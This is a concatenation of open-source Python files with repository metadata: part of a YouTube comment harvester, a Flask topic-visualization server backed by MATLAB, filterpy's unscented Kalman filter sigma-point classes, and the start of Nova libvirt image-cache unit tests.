comment_list = harvester.api_call("GetYouTubeVideoCommentFeed",{"video_id":snhvideo.fid})
get_next_comment_uri = update_all_comment_helper(harvester, snhvideo, comment_list)
while get_next_comment_uri:
comment_list = harvester.api_call("GetYouTubeVideoCommentFeed",{"uri":get_next_comment_uri})
get_next_comment_uri = update_all_comment_helper(harvester, snhvideo, comment_list)
usage = resource.getrusage(resource.RUSAGE_SELF)
logger.info(u"Comment harvest completed for this video: %s %s Mem:%s MB" % (snhvideo.fid, harvester,unicode(getattr(usage, "ru_maxrss")/(1024.0))))
def update_all_videos(harvester):
all_users = harvester.ytusers_to_harvest.all()
for snhuser in all_users:
out_of_window = False
if not snhuser.error_triggered:
logger.info(u"Will update user: %s(%s)" % (unicode(snhuser), snhuser.fid if snhuser.fid else "0"))
get_vid_url = 'http://gdata.youtube.com/feeds/api/users/%s/uploads?' % snhuser.username
while get_vid_url and not out_of_window:
video_list = harvester.api_call("GetYouTubeVideoFeed",{"uri":get_vid_url})
for video in video_list.entry:
published = datetime.strptime(video.published.text,'%Y-%m-%dT%H:%M:%S.000Z')
if published < harvester.harvest_window_to:
snhvideo = update_video(snhuser, video)
update_all_comment(harvester, snhvideo)
if published < harvester.harvest_window_from:
out_of_window = True
break
if not out_of_window:
get_vid_url = video_list.GetNextLink().href if video_list.GetNextLink() else None
else:
logger.info(u"Skipping user update: %s(%s) because user has triggered the error flag." % (unicode(snhuser), snhuser.fid if snhuser.fid else "0"))
usage = resource.getrusage(resource.RUSAGE_SELF)
logger.info(u"Video harvest completed %s Mem:%s MB" % (harvester,unicode(getattr(usage, "ru_maxrss")/(1024.0))))
def run_harvester_v1(harvester):
harvester.start_new_harvest()
try:
start = time.time()
update_users(harvester)
update_all_videos(harvester)
logger.info(u"Results computation complete in %ss" % (time.time() - start))
except:
logger.exception(u"EXCEPTION: %s" % harvester)
finally:
usage = resource.getrusage(resource.RUSAGE_SELF)
harvester.end_current_harvest()
logger.info(u"End: %s Stats:%s Mem:%s MB" % (harvester,unicode(harvester.get_stats()),unicode(getattr(usage, "ru_maxrss")/(1024.0))))
|
{
"content_hash": "0d8aec3f068fe1b8d1dc5226d142e3e6",
"timestamp": "",
"source": "github",
"line_count": 200,
"max_line_length": 158,
"avg_line_length": 39.985,
"alnum_prop": 0.6179817431536826,
"repo_name": "pylanglois/Social-Network-Harvester",
"id": "515fbac1c9421ae450872853790edcc0060756f8",
"size": "8013",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "SocialNetworkHarvester/snh/management/commands/cronharvester/youtubech.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "ActionScript",
"bytes": "31592"
},
{
"name": "CSS",
"bytes": "31414"
},
{
"name": "JavaScript",
"bytes": "517851"
},
{
"name": "Python",
"bytes": "252408"
},
{
"name": "Shell",
"bytes": "366"
}
],
"symlink_target": ""
}
|
from flask import Flask, request, g, render_template
from flask.ext.triangle import Triangle
from flask.ext.socketio import SocketIO, emit
from scipy import sparse, io
import numpy as np
from matlab import engine
import os, json, time
from flask.ext.cors import CORS
# Configuration
app = Flask(__name__, static_path='/static')
Triangle(app)
CORS(app)
app.config['CORS_HEADERS'] = 'Content-Type'
app.config['DEBUG'] = True
app.config.from_object(__name__)
app.config['PROFILE'] = True
# app.wsgi_app = ProfilerMiddleware(app.wsgi_app, restrictions=[10])
socketio = SocketIO(app)
# @app.after_request
# def after_request(response):
# response.headers.add('Access-Control-Allow-Origin', '*')
# response.headers.add('Access-Control-Allow-Headers', 'Content-Type,Authorization')
# response.headers.add('Access-Control-Allow-Methods', 'GET,PUT,POST,DELETE')
# return response
def supervisedTSNE(distanceMatrix, cl_idx, sameTopicWeight=0.9, differentTopicWeight=1.1):
n = distanceMatrix.shape[0]
for i in xrange(n):
i_topic = cl_idx[i]
for j in xrange(n):
if i==j:
continue
elif i_topic==cl_idx[j]:
distanceMatrix[i,j]*=sameTopicWeight
else:
distanceMatrix[i,j]*=differentTopicWeight
distanceMatrix[i,:] /= distanceMatrix[i,:].max()
return np.round(distanceMatrix,decimals=3)
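# A tiny self-contained example (illustrative only; the server never calls it)
# of what supervisedTSNE does: distances between documents that share a topic
# are shrunk, distances across topics are stretched, and each row is then
# normalised by its maximum and rounded.
def _example_supervised_weighting():
    distances = np.array([[0.0, 0.4, 0.8],
                          [0.4, 0.0, 0.6],
                          [0.8, 0.6, 0.0]])
    topics = [0, 0, 1]  # documents 0 and 1 share a topic; document 2 does not
    # After weighting, each row's maximum becomes 1.0 and same-topic entries
    # end up relatively smaller than cross-topic entries.
    return supervisedTSNE(distances, topics,
                          sameTopicWeight=0.8, differentTopicWeight=1.2)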
def before__first_request_():
global eng
global mappedX
global cl_idx
global Wtopk
global voca
global distanceMatrix
global distanceMatrix_main
tic = time.time()
print 'Starting matlab - ',
eng = engine.start_matlab()
eng.cd(os.path.dirname(os.getcwd()))
print "%.4f" % (time.time()-tic)
tic = time.time()
#dataset
#vis=0
#cnn=1
#nyt=2
# dataset=2
# if dataset ==0:
#eng.main_topic(nargout=0)
#distanceMatrix = io.loadmat('./../Visdata.mat')['DD']
# elif dataset ==1:
# eng.main_cnn(nargout=0)
# distanceMatrix = io.loadmat('./../result2.mat')['DD']
# else:
eng.main_nyt(nargout=0)
distanceMatrix = io.loadmat('./../nyt.mat')['DD']
mappedX = eng.workspace['mappedX']
cl_idx = eng.workspace['cl_idx']
Wtopk_idx = eng.workspace['Wtopk_idx']
voca = eng.workspace['dict']
print "%.4f" % (time.time()-tic)
tic = time.time()
print "Calculate data - ",
Wtopk = []
for idxArray in Wtopk_idx:
tempArray = []
for idx in idxArray:
tempArray.append(voca[int(idx)-1])
Wtopk.append(tempArray)
cl_idx = cl_idx[0]
# cl_idx = cl_idx
# distanceMatrix = distanceMatrix
# cl_idx = cl_idx
# distanceMatrix = distanceMatrix
sameTopicWeight = 0.8
differentTopicWeight = 1.2
distanceMatrix_main = supervisedTSNE(distanceMatrix, cl_idx,
sameTopicWeight=sameTopicWeight, differentTopicWeight=differentTopicWeight)
print "%.4f" % (time.time()-tic)
distanceMatrix_main = distanceMatrix_main.tolist()
@app.teardown_request
def teardown_request(exception):
pass
@app.route('/get_subTopic')
def get_subTopic():
global eng
global voca
global distanceMatrix
idx = json.loads(request.args.get('idx'))
eng.workspace['idx'] = idx
eng.sub_topic(nargout=0)
mappedXP_sub = eng.workspace['mappedX_sub']
cl_idx_sub = eng.workspace['cl_idx_sub']
Wtopk_idx_sub = eng.workspace['Wtopk_idx_sub']
k_sub = eng.workspace['k_sub'] # number of topics that will be shown
idx = [i-1 for i in idx]
Wtopk_sub = []
for idxArray in Wtopk_idx_sub:
tempArray = []
for topicIdx in idxArray:
tempArray.append(voca[int(topicIdx)-1])
Wtopk_sub.append(tempArray)
cl_idx_sub = cl_idx_sub[0]
cl_idx_sub = np.array(cl_idx_sub).tolist()
distanceMatrix_sub = distanceMatrix[idx,:][:,idx]
sameTopicWeight = 0.8
differentTopicWeight = 1.2
distanceMatrix_sub = supervisedTSNE(distanceMatrix_sub, cl_idx_sub,
sameTopicWeight=sameTopicWeight, differentTopicWeight=differentTopicWeight)
distanceMatrix_sub = distanceMatrix_sub.tolist()
return json.dumps({'distanceMatrix':distanceMatrix_sub, 'cl_idx_sub':cl_idx_sub, 'Wtopk_sub':Wtopk_sub})
###### socket test code
@socketio.on('connect', namespace='/subtopic')
def connect():
print "connected"
@socketio.on('disconnect', namespace='/subtopic')
def disconnect():
print "disconnected"
@socketio.on('get_subTopic', namespace='/subtopic')
def get_subTopic_(message):
global eng
global voca
global distanceMatrix
idx = message['idx']
socketId = message['socketId']
print "get Request - %s" % socketId
sameTopicWeight = 0.8
differentTopicWeight = 1.2
eng.workspace['idx'] = idx
print "before subtopic"
eng.sub_topic(nargout=0)
print "after subtopic"
k_sub = int(eng.workspace['k_sub'])
sub_k = int(eng.workspace['sub_k'])
idx = [i-1 for i in idx]
distanceMatrix_sub = distanceMatrix[idx,:][:,idx]
print "before iteration"
if k_sub-sub_k==0:
iterNum = 1
else:
iterNum = k_sub-sub_k
print iterNum
for i in xrange(1,iterNum+1):
print i
eng.workspace['i'] = i
eng.sub_topic_ith_Iter(nargout=0)
cl_idx_sub = eng.workspace['cl_idx_sub']
Wtopk_idx_sub = eng.workspace['Wtopk_idx_sub']
Wtopk_sub = []
for idxArray in Wtopk_idx_sub:
tempArray = []
for topicIdx in idxArray:
tempArray.append(voca[int(topicIdx)-1])
Wtopk_sub.append(tempArray)
cl_idx_sub = cl_idx_sub[0]
cl_idx_sub = np.array(cl_idx_sub).tolist()
distanceMatrix_sub_ = supervisedTSNE(distanceMatrix_sub, cl_idx_sub,
sameTopicWeight=sameTopicWeight, differentTopicWeight=differentTopicWeight)
        distanceMatrix_sub_ = distanceMatrix_sub_.tolist()
emit('result data'+socketId, {'distanceMatrix':distanceMatrix_sub_, 'cl_idx_sub':cl_idx_sub, 'Wtopk_sub':Wtopk_sub})
time.sleep(2)
return 1
#########################
# not used in gather plot
@app.route('/get_subTopic_tsne')
def get_subTopic_tsne():
global eng
global voca
idx = json.loads(request.args.get('idx'))
eng.sub_topic(nargout=0)
    mappedX_sub = eng.workspace['mappedX_sub']
cl_idx_sub = eng.workspace['cl_idx_sub']
Wtopk_idx_sub = eng.workspace['Wtopk_idx_sub']
k_sub = eng.workspace['k_sub'] # number of topics that will be shown
print mappedX_sub
Wtopk_sub = []
for idxArray in Wtopk_idx_sub:
tempArray = []
for idx in idxArray:
tempArray.append(voca[int(idx)-1])
Wtopk_sub.append(tempArray)
cl_idx_sub = cl_idx_sub[0]
mappedX_sub = np.array(mappedX_sub).tolist()
cl_idx_sub = np.array(cl_idx_sub).tolist()
return json.dumps({'mappedX_sub':mappedX_sub, 'cl_idx_sub':cl_idx_sub, 'Wtopk_sub':Wtopk_sub})
# receives the keyword input
@app.route('/')
def form():
global cl_idx
global Wtopk
global distanceMatrix_main
return render_template('tsne.html', cl_idx=cl_idx, Wtopk= Wtopk, distanceMatrix=distanceMatrix_main)
# Execute the main program
if __name__ == '__main__':
before__first_request_()
socketio.run(app,host='0.0.0.0',port=5004, debug=True)
|
{
"content_hash": "beb2b071bb10a01dc6d3a6eda6ef1099",
"timestamp": "",
"source": "github",
"line_count": 279,
"max_line_length": 118,
"avg_line_length": 24.010752688172044,
"alnum_prop": 0.6989102851171817,
"repo_name": "intuinno/topiclens",
"id": "e852ae9eebebddf6a211949d70f4259ba3bb3335",
"size": "6791",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "server/init.py",
"mode": "33261",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "194400"
},
{
"name": "HTML",
"bytes": "3258288"
},
{
"name": "JavaScript",
"bytes": "4067325"
},
{
"name": "Jupyter Notebook",
"bytes": "64001"
},
{
"name": "M",
"bytes": "1247"
},
{
"name": "Matlab",
"bytes": "322570"
},
{
"name": "PHP",
"bytes": "404"
},
{
"name": "Python",
"bytes": "49226"
},
{
"name": "Ruby",
"bytes": "497"
}
],
"symlink_target": ""
}
|
"""Copyright 2015 Roger R Labbe Jr.
FilterPy library.
http://github.com/rlabbe/filterpy
Documentation at:
https://filterpy.readthedocs.org
Supporting book at:
https://github.com/rlabbe/Kalman-and-Bayesian-Filters-in-Python
This is licensed under an MIT license. See the readme.MD file
for more information.
"""
from __future__ import division
import numpy as np
from scipy.linalg import cholesky
from filterpy.common import pretty_str
class MerweScaledSigmaPoints(object):
"""
    Generates sigma points and weights according to Van der Merwe's
    2004 dissertation[1] for the UnscentedKalmanFilter class. It
    parameterizes the sigma points using alpha, beta, and kappa terms, and
    is the version seen in most publications.
    Unless you know better, this should be your default choice.
Parameters
----------
n : int
Dimensionality of the state. 2n+1 weights will be generated.
alpha : float
        Determines the spread of the sigma points around the mean.
Usually a small positive value (1e-3) according to [3].
beta : float
Incorporates prior knowledge of the distribution of the mean. For
Gaussian x beta=2 is optimal, according to [3].
kappa : float, default=0.0
Secondary scaling parameter usually set to 0 according to [4],
or to 3-n according to [5].
sqrt_method : function(ndarray), default=scipy.linalg.cholesky
Defines how we compute the square root of a matrix, which has
no unique answer. Cholesky is the default choice due to its
speed. Typically your alternative choice will be
scipy.linalg.sqrtm. Different choices affect how the sigma points
are arranged relative to the eigenvectors of the covariance matrix.
Usually this will not matter to you; if so the default cholesky()
yields maximal performance. As of van der Merwe's dissertation of
        2004 [6] this was not a well researched area so I have no advice
to give you.
If your method returns a triangular matrix it must be upper
triangular. Do not use numpy.linalg.cholesky - for historical
reasons it returns a lower triangular matrix. The SciPy version
does the right thing.
subtract : callable (x, y), optional
Function that computes the difference between x and y.
You will have to supply this if your state variable cannot support
        subtraction, such as angles (359-1 degrees is 2, not 358). x and y
are state vectors, not scalars.
Attributes
----------
Wm : np.array
weight for each sigma point for the mean
Wc : np.array
weight for each sigma point for the covariance
Examples
--------
See my book Kalman and Bayesian Filters in Python
https://github.com/rlabbe/Kalman-and-Bayesian-Filters-in-Python
References
----------
    .. [1] R. Van der Merwe "Sigma-Point Kalman Filters for Probabilistic
Inference in Dynamic State-Space Models" (Doctoral dissertation)
"""
def __init__(self, n, alpha, beta, kappa, sqrt_method=None, subtract=None):
#pylint: disable=too-many-arguments
self.n = n
self.alpha = alpha
self.beta = beta
self.kappa = kappa
if sqrt_method is None:
self.sqrt = cholesky
else:
self.sqrt = sqrt_method
if subtract is None:
self.subtract = np.subtract
else:
self.subtract = subtract
self._compute_weights()
def num_sigmas(self):
""" Number of sigma points for each variable in the state x"""
return 2*self.n + 1
def sigma_points(self, x, P):
""" Computes the sigma points for an unscented Kalman filter
given the mean (x) and covariance(P) of the filter.
Returns tuple of the sigma points and weights.
Works with both scalar and array inputs:
sigma_points (5, 9, 2) # mean 5, covariance 9
sigma_points ([5, 2], 9*eye(2), 2) # means 5 and 2, covariance 9I
Parameters
----------
x : An array-like object of the means of length n
Can be a scalar if 1D.
examples: 1, [1,2], np.array([1,2])
P : scalar, or np.array
Covariance of the filter. If scalar, is treated as eye(n)*P.
Returns
-------
sigmas : np.array, of size (2n+1, n)
Two dimensional array of sigma points. Each column contains all of
the sigmas for one dimension in the problem space.
Ordered by Xi_0, Xi_{1..n}, Xi_{n+1..2n}
"""
if self.n != np.size(x):
raise ValueError("expected size(x) {}, but size is {}".format(
self.n, np.size(x)))
n = self.n
if np.isscalar(x):
x = np.asarray([x])
if np.isscalar(P):
P = np.eye(n)*P
else:
P = np.atleast_2d(P)
lambda_ = self.alpha**2 * (n + self.kappa) - n
U = self.sqrt((lambda_ + n)*P)
sigmas = np.zeros((2*n+1, n))
sigmas[0] = x
for k in range(n):
# pylint: disable=bad-whitespace
sigmas[k+1] = self.subtract(x, -U[k])
sigmas[n+k+1] = self.subtract(x, U[k])
return sigmas
def _compute_weights(self):
""" Computes the weights for the scaled unscented Kalman filter.
"""
n = self.n
lambda_ = self.alpha**2 * (n +self.kappa) - n
c = .5 / (n + lambda_)
self.Wc = np.full(2*n + 1, c)
self.Wm = np.full(2*n + 1, c)
self.Wc[0] = lambda_ / (n + lambda_) + (1 - self.alpha**2 + self.beta)
self.Wm[0] = lambda_ / (n + lambda_)
def __repr__(self):
return '\n'.join([
'MerweScaledSigmaPoints object',
pretty_str('n', self.n),
pretty_str('alpha', self.alpha),
pretty_str('beta', self.beta),
pretty_str('kappa', self.kappa),
pretty_str('Wm', self.Wm),
pretty_str('Wc', self.Wc),
pretty_str('subtract', self.subtract),
pretty_str('sqrt', self.sqrt)
])
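# A minimal usage sketch (illustrative only, not part of the filterpy API
# surface): generate sigma points for a 2-dimensional state. The mean and
# covariance values below are arbitrary examples.
def _example_merwe_points():
    points = MerweScaledSigmaPoints(n=2, alpha=1e-3, beta=2., kappa=0.)
    x = np.array([1., 2.])               # state mean
    P = np.diag([0.1, 0.3])              # state covariance
    sigmas = points.sigma_points(x, P)   # shape (2*n + 1, n) == (5, 2)
    # Wm and Wc recombine the transformed sigma points into a mean and a
    # covariance; their lengths match the number of sigma points.
    return sigmas, points.Wm, points.Wc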
class JulierSigmaPoints(object):
"""
    Generates sigma points and weights according to Simon J. Julier
    and Jeffrey K. Uhlmann's original paper[1]. It parameterizes the sigma
    points using kappa.
Parameters
----------
n : int
Dimensionality of the state. 2n+1 weights will be generated.
kappa : float, default=0.
Scaling factor that can reduce high order errors. kappa=0 gives
the standard unscented filter. According to [Julier], if you set
kappa to 3-dim_x for a Gaussian x you will minimize the fourth
order errors in x and P.
sqrt_method : function(ndarray), default=scipy.linalg.cholesky
Defines how we compute the square root of a matrix, which has
no unique answer. Cholesky is the default choice due to its
speed. Typically your alternative choice will be
scipy.linalg.sqrtm. Different choices affect how the sigma points
are arranged relative to the eigenvectors of the covariance matrix.
Usually this will not matter to you; if so the default cholesky()
yields maximal performance. As of van der Merwe's dissertation of
        2004 [6] this was not a well researched area so I have no advice
to give you.
If your method returns a triangular matrix it must be upper
triangular. Do not use numpy.linalg.cholesky - for historical
reasons it returns a lower triangular matrix. The SciPy version
does the right thing.
subtract : callable (x, y), optional
Function that computes the difference between x and y.
You will have to supply this if your state variable cannot support
        subtraction, such as angles (359-1 degrees is 2, not 358). x and y
        are state vectors, not scalars.
Attributes
----------
Wm : np.array
weight for each sigma point for the mean
Wc : np.array
weight for each sigma point for the covariance
References
----------
.. [1] Julier, Simon J.; Uhlmann, Jeffrey "A New Extension of the Kalman
Filter to Nonlinear Systems". Proc. SPIE 3068, Signal Processing,
Sensor Fusion, and Target Recognition VI, 182 (July 28, 1997)
"""
def __init__(self, n, kappa=0., sqrt_method=None, subtract=None):
self.n = n
self.kappa = kappa
if sqrt_method is None:
self.sqrt = cholesky
else:
self.sqrt = sqrt_method
if subtract is None:
self.subtract = np.subtract
else:
self.subtract = subtract
self._compute_weights()
def num_sigmas(self):
""" Number of sigma points for each variable in the state x"""
return 2*self.n + 1
def sigma_points(self, x, P):
r""" Computes the sigma points for an unscented Kalman filter
given the mean (x) and covariance(P) of the filter.
kappa is an arbitrary constant. Returns sigma points.
Works with both scalar and array inputs:
sigma_points (5, 9, 2) # mean 5, covariance 9
sigma_points ([5, 2], 9*eye(2), 2) # means 5 and 2, covariance 9I
Parameters
----------
x : array-like object of the means of length n
Can be a scalar if 1D.
examples: 1, [1,2], np.array([1,2])
P : scalar, or np.array
Covariance of the filter. If scalar, is treated as eye(n)*P.
kappa : float
Scaling factor.
Returns
-------
sigmas : np.array, of size (2n+1, n)
2D array of sigma points :math:`\chi`. Each column contains all of
the sigmas for one dimension in the problem space. They
are ordered as:
.. math::
:nowrap:
\begin{eqnarray}
\chi[0] = &x \\
\chi[1..n] = &x + [\sqrt{(n+\kappa)P}]_k \\
\chi[n+1..2n] = &x - [\sqrt{(n+\kappa)P}]_k
\end{eqnarray}
"""
if self.n != np.size(x):
raise ValueError("expected size(x) {}, but size is {}".format(
self.n, np.size(x)))
n = self.n
if np.isscalar(x):
x = np.asarray([x])
n = np.size(x) # dimension of problem
if np.isscalar(P):
P = np.eye(n) * P
else:
P = np.atleast_2d(P)
sigmas = np.zeros((2*n+1, n))
        # implements U'U = (n+kappa)*P. The default scipy.linalg.cholesky
        # returns an upper triangular matrix, so rows are accessed as U[k].
U = self.sqrt((n + self.kappa) * P)
sigmas[0] = x
for k in range(n):
# pylint: disable=bad-whitespace
sigmas[k+1] = self.subtract(x, -U[k])
sigmas[n+k+1] = self.subtract(x, U[k])
return sigmas
def _compute_weights(self):
""" Computes the weights for the unscented Kalman filter. In this
formulation the weights for the mean and covariance are the same.
"""
n = self.n
k = self.kappa
self.Wm = np.full(2*n+1, .5 / (n + k))
self.Wm[0] = k / (n+k)
self.Wc = self.Wm
def __repr__(self):
return '\n'.join([
'JulierSigmaPoints object',
pretty_str('n', self.n),
pretty_str('kappa', self.kappa),
pretty_str('Wm', self.Wm),
pretty_str('Wc', self.Wc),
pretty_str('subtract', self.subtract),
pretty_str('sqrt', self.sqrt)
])
class SimplexSigmaPoints(object):
"""
Generates sigma points and weights according to the simplex
method presented in [1].
Parameters
----------
n : int
Dimensionality of the state. n+1 weights will be generated.
sqrt_method : function(ndarray), default=scipy.linalg.cholesky
Defines how we compute the square root of a matrix, which has
no unique answer. Cholesky is the default choice due to its
speed. Typically your alternative choice will be
scipy.linalg.sqrtm
If your method returns a triangular matrix it must be upper
triangular. Do not use numpy.linalg.cholesky - for historical
reasons it returns a lower triangular matrix. The SciPy version
does the right thing.
subtract : callable (x, y), optional
Function that computes the difference between x and y.
You will have to supply this if your state variable cannot support
        subtraction, such as angles (359-1 degrees is 2, not 358). x and y
are state vectors, not scalars.
Attributes
----------
Wm : np.array
weight for each sigma point for the mean
Wc : np.array
weight for each sigma point for the covariance
References
----------
.. [1] Phillippe Moireau and Dominique Chapelle "Reduced-Order
Unscented Kalman Filtering with Application to Parameter
Identification in Large-Dimensional Systems"
DOI: 10.1051/cocv/2010006
"""
def __init__(self, n, alpha=1, sqrt_method=None, subtract=None):
self.n = n
self.alpha = alpha
if sqrt_method is None:
self.sqrt = cholesky
else:
self.sqrt = sqrt_method
if subtract is None:
self.subtract = np.subtract
else:
self.subtract = subtract
self._compute_weights()
def num_sigmas(self):
""" Number of sigma points for each variable in the state x"""
return self.n + 1
def sigma_points(self, x, P):
"""
        Computes the simplex sigma points for an unscented Kalman filter
given the mean (x) and covariance(P) of the filter.
Returns tuple of the sigma points and weights.
Works with both scalar and array inputs:
sigma_points (5, 9, 2) # mean 5, covariance 9
sigma_points ([5, 2], 9*eye(2), 2) # means 5 and 2, covariance 9I
Parameters
----------
x : An array-like object of the means of length n
Can be a scalar if 1D.
examples: 1, [1,2], np.array([1,2])
P : scalar, or np.array
Covariance of the filter. If scalar, is treated as eye(n)*P.
Returns
-------
sigmas : np.array, of size (n+1, n)
Two dimensional array of sigma points. Each column contains all of
the sigmas for one dimension in the problem space.
Ordered by Xi_0, Xi_{1..n}
"""
if self.n != np.size(x):
raise ValueError("expected size(x) {}, but size is {}".format(
self.n, np.size(x)))
n = self.n
if np.isscalar(x):
x = np.asarray([x])
x = x.reshape(-1, 1)
if np.isscalar(P):
P = np.eye(n) * P
else:
P = np.atleast_2d(P)
U = self.sqrt(P)
lambda_ = n / (n + 1)
Istar = np.array([[-1/np.sqrt(2*lambda_), 1/np.sqrt(2*lambda_)]])
for d in range(2, n+1):
row = np.ones((1, Istar.shape[1] + 1)) * 1. / np.sqrt(lambda_*d*(d + 1)) # pylint: disable=unsubscriptable-object
row[0, -1] = -d / np.sqrt(lambda_ * d * (d + 1))
Istar = np.r_[np.c_[Istar, np.zeros((Istar.shape[0]))], row] # pylint: disable=unsubscriptable-object
I = np.sqrt(n)*Istar
scaled_unitary = (U.T).dot(I)
sigmas = self.subtract(x, -scaled_unitary)
return sigmas.T
def _compute_weights(self):
""" Computes the weights for the scaled unscented Kalman filter. """
n = self.n
c = 1. / (n + 1)
self.Wm = np.full(n + 1, c)
self.Wc = self.Wm
def __repr__(self):
return '\n'.join([
'SimplexSigmaPoints object',
pretty_str('n', self.n),
pretty_str('alpha', self.alpha),
pretty_str('Wm', self.Wm),
pretty_str('Wc', self.Wc),
pretty_str('subtract', self.subtract),
pretty_str('sqrt', self.sqrt)
])
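# A brief comparison sketch (illustrative only): for the same state dimension
# the three families generate different numbers of sigma points, and the mean
# weights of each family sum to one.
def _example_compare_families(n=3):
    merwe = MerweScaledSigmaPoints(n, alpha=.1, beta=2., kappa=0.)
    julier = JulierSigmaPoints(n, kappa=1.)
    simplex = SimplexSigmaPoints(n)
    counts = (merwe.num_sigmas(), julier.num_sigmas(), simplex.num_sigmas())
    weight_sums = (np.sum(merwe.Wm), np.sum(julier.Wm), np.sum(simplex.Wm))
    return counts, weight_sums   # counts == (7, 7, 4); each sum is ~1.0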
|
{
"content_hash": "01e2105e5c425959eb244258f7017b21",
"timestamp": "",
"source": "github",
"line_count": 531,
"max_line_length": 125,
"avg_line_length": 30.6120527306968,
"alnum_prop": 0.5768071362657644,
"repo_name": "rlabbe/filterpy",
"id": "37875ae177be18dac5baf565d9e36e4309b5d979",
"size": "16341",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "filterpy/kalman/sigma_points.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "472"
},
{
"name": "Python",
"bytes": "508002"
},
{
"name": "Shell",
"bytes": "674"
}
],
"symlink_target": ""
}
|
import contextlib
import hashlib
import os
import time
import mock
from oslo_concurrency import lockutils
from oslo_concurrency import processutils
from oslo_config import cfg
from oslo_log import formatters
from oslo_log import log as logging
from oslo_serialization import jsonutils
from oslo_utils import importutils
from six.moves import cStringIO
from nova import conductor
from nova import context
from nova import objects
from nova import test
from nova.tests.unit import fake_instance
from nova import utils
from nova.virt.libvirt import imagecache
from nova.virt.libvirt import utils as libvirt_utils
CONF = cfg.CONF
CONF.import_opt('compute_manager', 'nova.service')
CONF.import_opt('host', 'nova.netconf')
@contextlib.contextmanager
def intercept_log_messages():
try:
mylog = logging.getLogger('nova')
stream = cStringIO()
handler = logging.logging.StreamHandler(stream)
handler.setFormatter(formatters.ContextFormatter())
mylog.logger.addHandler(handler)
yield stream
finally:
mylog.logger.removeHandler(handler)
class ImageCacheManagerTestCase(test.NoDBTestCase):
def setUp(self):
super(ImageCacheManagerTestCase, self).setUp()
self.stock_instance_names = set(['instance-00000001',
'instance-00000002',
'instance-00000003',
'banana-42-hamster'])
def test_read_stored_checksum_missing(self):
self.stub_out('os.path.exists', lambda x: False)
csum = imagecache.read_stored_checksum('/tmp/foo', timestamped=False)
self.assertIsNone(csum)
@mock.patch.object(os.path, 'exists', return_value=True)
@mock.patch.object(time, 'time', return_value=2000000)
@mock.patch.object(os.path, 'getmtime', return_value=1000000)
def test_get_age_of_file(self, mock_getmtime, mock_time, mock_exists):
image_cache_manager = imagecache.ImageCacheManager()
exists, age = image_cache_manager._get_age_of_file('/tmp')
self.assertTrue(exists)
self.assertEqual(1000000, age)
@mock.patch.object(os.path, 'exists', return_value=False)
def test_get_age_of_file_not_exists(self, mock_exists):
image_cache_manager = imagecache.ImageCacheManager()
exists, age = image_cache_manager._get_age_of_file('/tmp')
self.assertFalse(exists)
self.assertEqual(0, age)
def test_read_stored_checksum(self):
with utils.tempdir() as tmpdir:
self.flags(instances_path=tmpdir)
self.flags(image_info_filename_pattern=('$instances_path/'
'%(image)s.info'),
group='libvirt')
csum_input = '{"sha1": "fdghkfhkgjjksfdgjksjkghsdf"}\n'
fname = os.path.join(tmpdir, 'aaa')
info_fname = imagecache.get_info_filename(fname)
f = open(info_fname, 'w')
f.write(csum_input)
f.close()
csum_output = imagecache.read_stored_checksum(fname,
timestamped=False)
self.assertEqual(csum_input.rstrip(),
'{"sha1": "%s"}' % csum_output)
def test_read_stored_checksum_legacy_essex(self):
with utils.tempdir() as tmpdir:
self.flags(instances_path=tmpdir)
self.flags(image_info_filename_pattern=('$instances_path/'
'%(image)s.info'),
group='libvirt')
fname = os.path.join(tmpdir, 'aaa')
old_fname = fname + '.sha1'
f = open(old_fname, 'w')
f.write('fdghkfhkgjjksfdgjksjkghsdf')
f.close()
csum_output = imagecache.read_stored_checksum(fname,
timestamped=False)
self.assertEqual(csum_output, 'fdghkfhkgjjksfdgjksjkghsdf')
self.assertFalse(os.path.exists(old_fname))
info_fname = imagecache.get_info_filename(fname)
self.assertTrue(os.path.exists(info_fname))
def test_list_base_images(self):
listing = ['00000001',
'ephemeral_0_20_None',
'17d1b00b81642842e514494a78e804e9a511637c_5368709120.info',
'00000004',
'swap_1000']
images = ['e97222e91fc4241f49a7f520d1dcf446751129b3_sm',
'e09c675c2d1cfac32dae3c2d83689c8c94bc693b_sm',
'e97222e91fc4241f49a7f520d1dcf446751129b3',
'17d1b00b81642842e514494a78e804e9a511637c',
'17d1b00b81642842e514494a78e804e9a511637c_5368709120',
'17d1b00b81642842e514494a78e804e9a511637c_10737418240']
listing.extend(images)
self.stub_out('os.listdir', lambda x: listing)
self.stub_out('os.path.isfile', lambda x: True)
base_dir = '/var/lib/nova/instances/_base'
self.flags(instances_path='/var/lib/nova/instances')
image_cache_manager = imagecache.ImageCacheManager()
image_cache_manager._list_base_images(base_dir)
sanitized = []
for ent in image_cache_manager.unexplained_images:
sanitized.append(ent.replace(base_dir + '/', ''))
self.assertEqual(sorted(sanitized), sorted(images))
expected = os.path.join(base_dir,
'e97222e91fc4241f49a7f520d1dcf446751129b3')
self.assertIn(expected, image_cache_manager.unexplained_images)
expected = os.path.join(base_dir,
'17d1b00b81642842e514494a78e804e9a511637c_'
'10737418240')
self.assertIn(expected, image_cache_manager.unexplained_images)
unexpected = os.path.join(base_dir, '00000004')
self.assertNotIn(unexpected, image_cache_manager.unexplained_images)
for ent in image_cache_manager.unexplained_images:
self.assertTrue(ent.startswith(base_dir))
self.assertEqual(len(image_cache_manager.originals), 2)
expected = os.path.join(base_dir,
'17d1b00b81642842e514494a78e804e9a511637c')
self.assertIn(expected, image_cache_manager.originals)
unexpected = os.path.join(base_dir,
'17d1b00b81642842e514494a78e804e9a511637c_'
'10737418240')
self.assertNotIn(unexpected, image_cache_manager.originals)
self.assertEqual(1, len(image_cache_manager.back_swap_images))
self.assertIn('swap_1000', image_cache_manager.back_swap_images)
def test_list_backing_images_small(self):
self.stub_out('os.listdir',
lambda x: ['_base', 'instance-00000001',
'instance-00000002', 'instance-00000003'])
self.stub_out('os.path.exists',
lambda x: x.find('instance-') != -1)
self.stubs.Set(libvirt_utils, 'get_disk_backing_file',
lambda x: 'e97222e91fc4241f49a7f520d1dcf446751129b3_sm')
found = os.path.join(CONF.instances_path,
CONF.image_cache_subdirectory_name,
'e97222e91fc4241f49a7f520d1dcf446751129b3_sm')
image_cache_manager = imagecache.ImageCacheManager()
